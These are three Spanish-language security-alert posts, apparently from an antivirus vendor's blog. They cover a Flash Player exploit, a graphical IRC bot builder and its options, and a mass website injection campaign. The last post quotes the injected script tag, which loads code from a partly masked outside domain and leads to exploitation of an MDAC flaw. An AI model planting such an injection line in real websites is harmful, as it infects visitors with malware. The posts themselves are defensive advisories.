Se han reportado gran cantidad de sitios que, aprovechando una vulnerabilidad en Flash Player de la empresa Adobe, descargan e instalan malware en el equipo del usuario. Esta vulnerabilidad, un desbordamiento de buffer, permite ejecutar scripts en el equipo del usuario y la posterior descarga de códigos dañinos.

Adobe, luego de su investigación, ha catalogado a esta vulnerabilidad como crítica y que solo afectaría (aún en investigación) a las versiones de Flash Player anteriores a la última versión Flash Player 9.0.124.0 por lo que es recomendable:

• Actualizar de inmediato este reproductor desde la página de descarga oficial de Adobe.
• Utilizar aplicaciones que permitan el bloqueo de scripts desde sitios web.
• Utilizar un antivirus con capacidades proactivas para detectar y bloquear la posible descarga de malware a través de vulnerabilidades como estas.

En este momento, ESET NOD32 detecta los archivos Flash maliciosos como SWF/TrojanDownloader.Swif.C y las amenazas descargadas como gusano Jalous o como troyano TrojanDownloader.Psyme.

Como siempre mencionamos, los creadores de malware se valen de muchas herramientas y la falta de actualización del sistema operativo y de las aplicaciones, por parte del usuario, es una de ellas. Recuerde que actualizar todas las aplicaciones es fundamental.

Actualización 01/06/2008

Cristian

Promedio: 5

Categorias: Alertas, Malware, Vulnerabilidades
4 Comentarios »

En anteriores ocasiones hemos hablado de cómo usuarios maliciosos controlan sus botnets, de sus estadísticas de infección y de cómo se propaga este tipo de troyanos. Sin embargo, para poder cubrir todo el ciclo es necesario explicar las metodologías utilizadas para crear las mismas. Las tendencias que hemos observado consisten en modificar el código de bots ajenas (de otros delincuentes), para luego empaquetarlas e intentar volverlas indetectables pero, nunca falta alguien que lo facilite para el usuario malintencionado que no posee conocimientos de programación:

Como se observa, no es más que un creador de troyanos del tipo bots con entorno gráfico, en el que solo se deben especificar los siguientes parámetros:

• Nombre del servidor IRC
• Puerto del servidor
• Nombre del canal IRC
• Nick del administrador malicioso (botner) al que responderán los equipos infectados
• Métodos de propagación
• Nombre del archivo ejecutable
• Opción de empaquetar con UPX el ejecutable eligiendo, a su vez, el nivel de compresión
• Mensaje de respuesta del equipo zombi al conectarse
• Nombre del malware al copiarse al equipo
• Nombre del malware al copiarse al registro de Windows
• Establecer un icono para el malware

De esta forma no se necesitan conocimientos para crear una bot y su desarrollo se realiza con extremada facilidad. Sin embargo, a pesar de la multitud de opciones posibles, y de utilizar el nivel máximo de empaquetamiento, ESET NOD32 detecta el servidor creado bajo el nombre de Win32/Brabot.A.

Joaquín

Promedio: 3

Categorias: Curiosidades, Malware
1 Comentario »

Durante esta madrugada, nuestro laboratorio detectó otro caso donde varios miles de sitios web fueron modificados por atacantes para inyectar códigos maliciosos en sus páginas.

En esta oportunidad, se inyecta una línea como la siguiente en el sitio web vulnerable:

<script src=http://www.ch****.com/reg.js></script>

Ese archivo contiene código JavaScript que crea una etiqueta iFrame en el sitio web, la cual apunta a otro script, en este caso VBScript, que ESET NOD32 Antivirus detecta como VBS/TrojanDownloader.Iframe.NAA, que luego descarga otros tantos códigos maliciosos aprovechando una vulnerabilidad existente en el componente ActiveX de MDAC de Windows.

Esta vulnerabilidad está documentada en el siguiente enlace:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003

La misma puede ser parcheada con la actualización disponible aquí:

http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

La inyección de códigos maliciosos en sitios webs tradicionales, aprovechando vulnerabilidades en estos últimos, es una técnica cada vez más usada en estos días, como hemos reportado aquí en varias oportunidades.

Como siempre, recomendamos que mantengan sus antivirus actualizados y con las capacidades de detección heurística activadas a fin de mantenerse protegidos contra estas amenazas que aparecen a diario.

En cuanto a los administradores de sitios web, es importante que mantengan actualizado el software que utilizan tanto para su servidor como el sitio en si mismo, y que apliquen prácticas de programación segura para evitar las inyecciones de código.

Franco

Promedio: 5

Categorias: Alertas, Malware, Vulnerabilidades
4 Comentarios »